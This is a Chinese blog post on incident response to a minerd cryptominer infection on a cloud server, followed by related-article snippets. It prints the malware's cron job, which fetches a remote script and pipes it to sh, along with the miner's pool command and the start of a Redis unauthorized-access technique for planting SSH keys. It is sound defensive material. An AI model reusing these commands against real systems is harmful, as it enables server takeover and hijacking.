minerd木马攻击处理(1)

阿里云上报警提示有异地IP登陆,上去之后发现服务器被黑了。以下是处理过程:

木马排查

1,首先top发现有minerd对CPU的占有达到了100%,此前这台服务器上是没有跑任何应用的,直觉告诉我minerd有问题哦

[[email protected]_sas01 ~/.ssh]# ps aux|grep minerd

root 7174 99.6 0.1 239504 5400 ? SLsl 15:08 29:05 /opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:6666 -u 448J3JccPv4D8XWvFJ6wFwLZuVtYdQSSFKoKnLS5pU4EL6SfsGvg4AAHqNeLK8LguDFpJtcFJ6ZWr1NAbuEVmHEz5JftEox -p x

root 7727 0.0 0.0 103260 872 pts/2 S+ 15:37 0:00 grep minerd

可以看到,root用户启动的。应该是已经被攻陷了。minerd路径在/opt下

进入/opt下

[[email protected]_sas01 /opt]# ls

KHK75NEOiq33 minerd rh

多了两个文件KHK75NEOiq33 minerd

一看文件时间,果然,都是刚刚创建的,创建时间15:07,这下好了,先来安装文件创建时间来查一波。看他到底做了多少事情。

[[email protected]_sas01 /opt]# rm KHK75NEOiq33 minerd

rm: remove regular file `KHK75NEOiq33‘? y

rm: remove regular file `minerd‘? y

先把文件删掉,进程杀掉。过了一会又生成了。必须看一下定时任务啊

发现/var/spool/cron/root被修改,还多了个/var/spool/cron/crontabs/root

定时任务被修改了。

删删删。。。清除定时任务。之后发现没什么乱用,minerd进程很坚挺,不管了先,排除一下还有什么东西

查看一下定时任务的日志

可以看到他通过curl命令在网上拉东西,我手动拉一下看看*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706

下载下来是个pm.sh脚本

就是这么个东西。。。

添加定时任务,修改登录认证,重启sshd服务

创建/opt/KHK75NEOiq33 安装

还启动ntp服务。一开始没注意,但一看启动时间,就觉得有问题了,linux自带的时间服务器是ntpd。一字之差误导众生,干掉先

在/etc/ini.t发现ntp服务,创建时间和/opt下的minerd一样的。

顺便看了一下rc.d下发现很多新创建的链接都连接到ntp。。

这个ntp应该就是minerd的守护进程了吧。

此时也改看一下.ssh目录了,毕竟免登陆就是在这里

[[email protected]_sas01 ~]# ls .ssh

id_rsa id_rsa.pub known_hosts KHK75NEOiq

看到了KHK75NEOiq这么个文件他是在对方pm.sh文件里生成的,毕竟authorized_keys被他删掉了么。

查一下/root/.viminfo

""1 LINE 0

PubkeyAuthentication yes

"2 LINE 0

RSAAuthentication yes

"3 LINE 0

PermitRootLogin yes

"4 LINE 0

AuthorizedKeysFile .ssh/KHK75NEOiq

cat /etc/ssh/sshd_config

PubkeyAuthentication yes

RSAAuthentication yes

PermitRootLogin yes

AuthorizedKeysFile .ssh/KHK75NEOiq

最下边多了这4行
修改了认证文件指向了KHK75NEOiq 删掉配置先

先禁止22端口登陆,禁止root登陆
防火墙禁掉出了本地ssh登陆以外的所有入站操作。

[[email protected]_sas01 /etc/rc.d/rc3.d]# ls /usr/sbin/ntp -l

-rwxr-xr-x 1 root root 8444416 Oct 20 15:07 /usr/sbin/ntp

/etc/init.d/ntp中发现ntp路径/usr/sbin/ntp

[[email protected]_sas01 /etc/rc.d/rc3.d]# rm /usr/sbin/ntp

rm: remove regular file `/usr/sbin/ntp‘? y

清理一下rc.d下边的链接

[[email protected]_sas01 /etc/rc.d]# ll -t rc1.d/

total 0

lrwxrwxrwx 1 root root 15 Oct 20 15:07 K02ntp -> /etc/init.d/ntp

找到rc.d下的15:07创建的指向/etc/init.d/ntp的链接

[[email protected]_sas01 /etc/rc.d]# rm init.d/ntp

[[email protected]_sas01 /etc/rc.d]# rm -rf rc0.d/K02ntp

[[email protected]_sas01 /etc/rc.d]# rm -rf rc1.d/K02ntp

[[email protected]_sas01 /etc/rc.d]# rm -rf rc2.d/S50ntp

[[email protected]_sas01 /etc/rc.d]# rm -rf rc3.d/S50ntp

[[email protected]_sas01 /etc/rc.d]# rm -rf rc4.d/S50ntp

[[email protected]_sas01 /etc/rc.d]# rm -rf rc5.d/S50ntp

[[email protected]_sas01 /etc/rc.d]# rm -rf rc6.d/K02ntp

通过时间查找发现/usr/local下有个etc 里边有个minerd.conf

[[email protected]_sas01 /usr/local/etc]# ll

-rw-r--r-- 1 root root 162 Oct 20 15:07 minerd.conf

[[email protected]_sas01 /usr/local/etc]# cat minerd.conf

-B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:6666 -u 448J3JccPv4D8XWvFJ6wFwLZuVtYdQSSFKoKnLS5pU4EL6SfsGvg4AAHqNeLK8LguDFpJtcFJ6ZWr1NAbuEVmHEz5JftEox -p x[

删除木马日志

[[email protected]_sas01 ~]# rm /var/log/ntp.err

杀掉minerd进程

之后发现没有再起来。。。

配置改回来,修改服务器密码

杀毒算完成了,可是他是怎么进来的呢。。。因为是我刚安装的系统,就只装了个redis和rabbitmq 其他应用都没有呢

https://www.aolens.cn/?p=1069

时间: 2024-11-07 05:07:46

minerd木马攻击处理(1)的相关文章

minerd木马攻击处理(2)

杀毒算完成了,可是他是怎么进来的呢...因为是我刚安装的系统,就只装了个redis和rabbitmq 其他应用都没有呢 我发现我的redis的 bind 0.0.0.0:6379 默认的....应该是这边进来的.我自己做了下尝试... [[email protected]_sas01 ~/.ssh]# redis-cli 127.0.0.1:6379> set aa "公钥" OK 127.0.0.1:6379> config set dir /root/.ssh/ OK

【安全预警】暗云Ⅲ木马攻击预警

根据阿里云收到的最新安全威胁情报,近日,腾讯安全研究团队监控到暗云Ⅲ通过下载站大规模传播,可能与DDoS攻击相关并引发大规模攻击事件.该病毒通过感染磁盘MBR来实现开机启动,感染用户数量巨大,是目前已知复杂度最高感染用户数量最大的木马之一.此病毒还兼容X86.X64两种版本的XP.Win7等操作系统,影响范围十分广泛.同时该木马主要通过外挂.游戏辅助.私服登录器等传播,此类软件通常诱导用户关闭安全软件后使用,使得木马得以乘机植入. 阿里云安全提醒您关注该事件并做好安全防护. 1.影响范围有哪些?

PHP防止木马攻击的措施

防止跳出web目录 只允许你的PHP脚本在web目录里操作,针对Apache,还可以修改httpd.conf文件限制PHP操作路径. 例如:php_admin_value  open_basedir(将用户可操作的文件限制在某目录下)  web目录. 在Linux系统中web根目录有个.user.ini文件,修改该文件与修改httpd.conf文件效果一样. .user.ini文件文档介绍: 自 PHP 5.3.0 起,PHP 支持基于每个目录的 .htaccess 风格的 INI 文件.此类文

企业的网站遭受木马攻击了,导致网站目录下所有文件都被篡改了

问题: 一个 lamp 的服务器站点目录下所有文件均被植入如下内容 <script language=javascript src=http://luoahong.blog.51cto.com/504977/1827164> 包括图片文件也被植入了,网站打开时就会调用这个地址,造成的影响很恶劣. 实际解决办法: 思路是:需要遍历所有目录有文件 把以上被植入的内容删除掉. 1.  先备份数据.然后,执行命令批量修改回来. 2.  a.备份原始出问题的原始文件: b.历史备份覆盖:c.find+s

阿里云主机遭受minerd类型攻击

现象:就是cpu使用率超级大,能到300% 木马脚本内容: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/10 * * * * cu

minerd挖矿木马

由于用的是临时服务器,安全性上疏忽了,导致受到了minerd木马攻击,清理的时候,遇到了ntp这个很具有迷惑性的服务,费了一番功夫才敢彻底清理. 现状描述 1 top可以看到,这个minerd 程序把cpu跑满了 2 ps aux | grep minerd 可知是这个程序: /opt/minerd --- 这个不是我们自己启动的,可以断定服务器被黑了 这个进程是root用户启动的,代码有漏洞可能性不大(web服务是www用户启动的),多半黑客已经登录服务器了 3 有可能是免密登录了,去/roo

黑客可借App漏洞攻击手机银行客户端,爱加密为移动支付App提供安全防护!

安卓系统安全问题一直以来被业界所诟病.近日有安全报告指出,安卓手机系统漏洞严重威胁网民支付安全.利用安卓系统漏洞,黑客可以对手机银行客户端实施注入攻击,截获用户银行账号密码,造成财产损失.进行测试的16款手机银行客户端均未能防御此类攻击.    据中国互联网络信息中心(cnnic)的数据显示,由于中国手机支付用户规模成倍增长(同比增长126.9%),截止2013年12月已达1.25亿,移动支付成为大趋势.而伴随这一趋势产生的移动支付安全问题也"水涨船高".近年来,由于遭受木马.恶意插件

2018-2019-2 20165314『网络对抗技术』Final:反弹木马的剖析与实现

参考文献: 木马攻击与隐蔽技术研究 线程注入式无进程木马的实现原理 木马技术研究及反弹木马系统的设计与实现 原文地址:https://www.cnblogs.com/zhangshuai9345/p/10897818.html

疑似Groip123 (APT37) 攻击事件记录

文章摘自腾讯安全 原文地址:https://s.tencent.com/research/report/831.html 一.事件概述 腾讯御见威胁情报中心在2019年8月底到9月中旬,检测到一批针对疑似中韩贸易等相关人士的钓鱼攻击活动.经过分析溯源发现,疑似是Group123攻击组织的最新攻击活动. Group123,又被称为APT37,疑似来自朝鲜的攻击组织,该组织经常攻击国内的外贸公司.在华外企高管,甚至政府部门.该组织最常使用鱼叉钓鱼邮件进行定向攻击,使用Nday或者0day漏洞进行木马